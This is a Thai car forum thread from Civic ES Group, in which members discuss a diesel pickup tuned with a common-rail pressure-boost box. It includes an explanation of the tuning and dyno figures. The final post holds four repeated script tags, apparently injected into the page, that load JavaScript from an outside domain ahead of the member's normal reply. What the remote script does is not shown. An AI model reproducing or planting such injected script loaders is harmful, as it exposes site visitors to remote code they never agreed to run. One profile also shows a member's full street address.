ตอบ
sumateES01


ชื่อเล่น: เมทร

เข้าร่วม: 13 มกรา 2013
ตอบ: 381

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 450
ให้คำขอบคุณ: 326

ที่อยู่: แถวๆนนทบุรี
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 11 เมษา 2013 10:18 - สนุกจริงๆเชพดันราง คราวหน้าเอาใหม่นะ...
เครื่อง K20 NA สู้ไหวปล่าวครับ  
ได้รับคำขอบคุณจาก: civicnoom 
civicnoom


ชื่อเล่น: หนุ่ม

เข้าร่วม: 31 สิงหา 2012
ตอบ: 136

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 225
ให้คำขอบคุณ: 1780

ปี: 2001
พฤหัส, 11 เมษา 2013 10:33 - สนุกจริงๆเชพดันราง คราวหน้าเอาใหม่นะ...
Kriss_es04 พิมพ์ว่า:
@ กล่องดันราง

การดันราง คือ การเพิ่มแรงดันในระบบฉีดจ่ายน้ำมันแบบคอมมอนเรล หรือภาษาไทยๆเรียกว่า แบบรางฉีดร่วม
ซึ่งโดยปกติ ปั๊มคอมมอนเรลจะมีหน้าที่ปั่นและอัดส่งสร้างน้ำมันที่มีแรงดันสูงมากๆไปยังรางคอมมอนเรลเพื่อรอจ่ายน้ำมันไปยังหัวฉีด

ซึ่งเมื่อทำการติดตั้งกล่องดันรางเข้าไป กล่องตัวนี้จะทำหน้าที่ส่งสัญญาณให้ปั๊มสร้างแรงอัดน้ำมันได้สูงขึ้น
แรงดันในระบบจึงสูงขึ้น ฉีดน้ำมันได้แรงกว่าเดิม การเผาไหม้จึงดีขึ้น ส่งผลให้รถแรงขึ้น แต่ไม่ได้ทำให้จ่ายน้ำมันมากขึ้น
เพราะหัวฉีดก็ยังคงฉีดจ่ายน้ำมันเป็นปริมาณเท่าเดิม ใน 1 จังหวะรอบการทำงาน งงไหมครับ....

แต่เมื่อรถมีกำลังมากขึ้น ทั้งแรงม้าและแรงบิดจากการดันรางนี้ เมื่อเราขับขี่ในสไตล์เดิม ที่ความเร็วเท่าๆเดิม
จะได้ความประหยัดมากกว่าเพราะแรงบิดรถดีขึ้น อัตราเร่งทำได้ดีกว่าเดิม จึงไม่ต้องเค้นคันเร่งมากไงครับ

โดยทั่วไป เมื่อเราติดตั้งกล่องดันราง ผู้ติดตั้งก็นิยมมีการทำท้ายรางเพิ่มเติมด้วยเพื่อให้แมตซ์กับแรงดันที่ปรับจูน
ป้องกันปัญหาไฟโชว์ เครื่องสะดุดเมื่อรอบสูงๆ ท้ายรางก็คือ อุปกรณ์ตัวนึงที่เป็นตัวลิมิตแรงดันในระบบอยู่ตรงด้านท้ายของรางคอมมอนเรล
มีหลักการทำงานคือสปริงพร้อมลิ้นระบายแรงดัน (Pressure Regulator) ทำหน้าที่คอยระบายแรงดันในรางคอมมอนเรลที่เกินค่าที่กำหนดให้ไหลกลับ
ซึ่งทำได้โดยการใส่ชิมรองเข้าไปที่สปริง ทำให้สปริงมีค่าแข็งขึ้น แรงดันระบายออกได้ช้าลง ทำให้การสร้างแรงดันในรอบสูงๆ ไม่มีปัญหาเครื่องสะดุดครับ

ส่วนเรื่องรางแตกนั้น โดยทั่วๆไป เกิดขึ้นได้ยากมาก เพราะรางคอมมอนเรลมีค่า factor เผื่อมาให้รับแรงดันได้สูงกว่าสเปคโรงงานเยอะมาก
เว้นแต่จะมีการ"อุด"ท้ายรางแบบถาวร ซึ่งนิยมทำกันในรถแข่งสนาม โดยเฉพาะประเภท Drag เพราะพวกนี้
เขาจะใช้กล่องโมดิฟายใบเดียวคุมแทนกล่องเดิมของเครื่องยนต์ครับ หรือที่เรียกว่า "Stand Alone" สำหรับรถบ้าน
สบายใจได้ จะมีก็แต่กรณีท้ายรางรั่วซึ่งเกิดจากผู้ติดตั้งในบางรายติดตั้งไม่ดีเท่านั้นเอง ซึ่งสามารถแก้ไขได้ไม่ยากครับผม

@ข้อมูลนี้ เป็นของเวปฟอร์จูนเนอร์คลับเท่านั้น หากผู้ใดจะนำข้อมูลไปเผยแพร่ โปรดให้เครดิต "ฟอร์จูนเนอร์คลับ" ด้วยนะ@
ขอขอบคุณข้อมูลจาก http://www.fortuner-club.com



แน่นจริง ขอบคุณครับ
civicnoom


ชื่อเล่น: หนุ่ม

เข้าร่วม: 31 สิงหา 2012
ตอบ: 136

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 225
ให้คำขอบคุณ: 1780

ปี: 2001
พฤหัส, 11 เมษา 2013 10:35 - สนุกจริงๆเชพดันราง คราวหน้าเอาใหม่นะ...
sumateES01 พิมพ์ว่า:
เครื่อง K20 NA สู้ไหวปล่าวครับ  



ผมคิดว่าไหวนะ อาจจะแรงกว่าด้วยซ้ำนะครับ
N_J Civic


เข้าร่วม: 27 ตุลา 2009
ตอบ: 3806

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5146
ให้คำขอบคุณ: 5687

ที่อยู่: นิคม304 - ปราจีน - ชัยภูมิ
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 11 เมษา 2013 10:41 - สนุกจริงๆเชพดันราง คราวหน้าเอาใหม่นะ...
เครื่องแรง ใจแรงด้วยป่าว
ES ใจแรงทุกคัน
ได้รับคำขอบคุณจาก: civicnoom 
Kriss_es04


ชื่อเล่น: อ๊อด

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1745

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1544
ให้คำขอบคุณ: 234

ที่อยู่: ดินแดง-แจ้งวัฒนะ-นนทบุรี-มหาชัย-พระราม2-กระทุ่มแบน-สามพราน
ปี: 2004
พฤหัส, 11 เมษา 2013 12:24 - สนุกจริงๆเชพดันราง คราวหน้าเอาใหม่นะ...
ไม่รู้ว่าจริงหรือเปล่าเค้าว่ามันแรงมาก

จากการทดสอบขึ้น Dyno จริงๆ
รถเดิม
แรงม้า 163 HP, แรงบิด 340(หรือ360นี่แหละ) N-m
หลังจากใส่กล่อง ดันราง+ปลดบูส+เปลี่ยนหัวฉีด
แรงม้า 238 HP, แรงบิด 580 N-m
ได้รับคำขอบคุณจาก: civicnoom 
Tiv


ชื่อเล่น: ติ้ว

เข้าร่วม: 13 มีนา 2011
ตอบ: 1380

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1520
ให้คำขอบคุณ: 455

ที่อยู่: ปราจีน-นครสวรรค์
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 11 เมษา 2013 16:18 - สนุกจริงๆเชพดันราง คราวหน้าเอาใหม่นะ...
มีภายในตัวนอกอย่าง. ESประล่ะ
ได้รับคำขอบคุณจาก: civicnoom 
toptwo


ชื่อเล่น: ท็อป

เข้าร่วม: 25 มิถุนา 2011
ตอบ: 1000

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1279
ให้คำขอบคุณ: 1707

ที่อยู่: Samrong & Kanchanaburi
ปี: 2003
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 11 เมษา 2013 16:45 - สนุกจริงๆเชพดันราง คราวหน้าเอาใหม่นะ...
อาวุธลับของดีเซล คือปล่อยควันบังทาง ถ้าเล่นกะมันห้ามตามตูด 555
ได้รับคำขอบคุณจาก: civicnoom 
anglo


ชื่อเล่น: นัท

เข้าร่วม: 10 พฤษภาคม 2012
ตอบ: 1475

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1496
ให้คำขอบคุณ: 621

ที่อยู่: 19/313 หมู่บ้านณัฐกมล รัษฎา2 ซ.3 ถ.รัษฎานุสรณ์ ต.รัษฎา อ.เมือง จ.ภูเก็ต 83000
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 11 เมษา 2013 17:27 - สนุกจริงๆเชพดันราง คราวหน้าเอาใหม่นะ...
กระบะยุคนี้มันบ้าพลังครับ

es อย่างเราๆ ขับขี่ปลอดภัย ดีกว่าเนอะ
ได้รับคำขอบคุณจาก: civicnoom 
Thanatip


ชื่อเล่น: เค็ก

เข้าร่วม: 16 สิงหา 2011
ตอบ: 376

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 324
ให้คำขอบคุณ: 497

ที่อยู่: แพร่
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 11 เมษา 2013 22:22 - สนุกจริงๆเชพดันราง คราวหน้าเอาใหม่นะ...
กระบะ แรงจริง สมัยนี้ vigo พ่อผม 3000 เดิมๆ ยัง วิ่ง 200 ได้เลย แต่ มันหวิวๆ ยังไงไม่รู้ เหมือนมันจะ ลอย
ได้รับคำขอบคุณจาก: civicnoom 
หาดเจ้า


ชื่อเล่น: เจ

เข้าร่วม: 05 พฤศจิกา 2012
ตอบ: 815

Guru ES
Guru ES

ได้รับคำขอบคุณ: 854
ให้คำขอบคุณ: 1065

ที่อยู่: หาดเจ้าสำราญ
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 12 เมษา 2013 10:37 - สนุกจริงๆเชพดันราง คราวหน้าเอาใหม่นะ...
ขับขี่ปลอดภัยปล่อยมันไปเถอะครับ
ได้รับคำขอบคุณจาก: civicnoom 
coco1340


เข้าร่วม: 11 มกรา 2012
ตอบ: 1239

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1169
ให้คำขอบคุณ: 302

ที่อยู่: พระราม 2
อาทิตย์, 14 เมษา 2013 01:22 - สนุกจริงๆเชพดันราง คราวหน้าเอาใหม่นะ...
<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></   เคยสวนเหมือนกันครับ 1 2 3 พอได้นะครับ พอบูส เค้ามาผมก็ยกคันเร่ง  อิอิ จบ na อย่างเราผมว่ารอบต้นจัดกว่านะ 
ได้รับคำขอบคุณจาก: civicnoom 
ตอบ
หน้า 2 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.